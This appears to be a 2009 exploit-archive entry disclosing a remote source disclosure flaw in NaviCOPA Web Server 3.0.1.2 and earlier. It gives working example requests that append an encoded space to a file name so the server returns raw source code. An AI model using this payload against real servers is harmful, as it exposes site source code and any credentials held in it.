NaviCOPA <= 3.0.1.2 Source Disclosure

2009-10-14T00:00:00
ID 1337DAY-ID-9563
Type zdt
Reporter Dr_IDE
Modified 2009-10-14T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            =====================================
NaviCOPA <= 3.0.1.2 Source Disclosure
=====================================


# Title: NaviCOPA <= 3.0.1.2 Source Disclosure
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Dr_IDE
# Published: 2009-10-14
# Verified: yes


view source
print?
################################################
#
# NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.navicopa.com/download.html
#
################################################
 
- Description -
 
NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the latest
version of the application available.
 
NaviCOPA is vulnerable to remote arbitrary source code disclosure by the
following means.
 
- Technical Details -
 
http://[ webserver IP]/[ file ][%20]
 
http://172.16.2.101/index.html%20
http://172.16.2.101/index.php%20



#  0day.today [2018-01-03]  #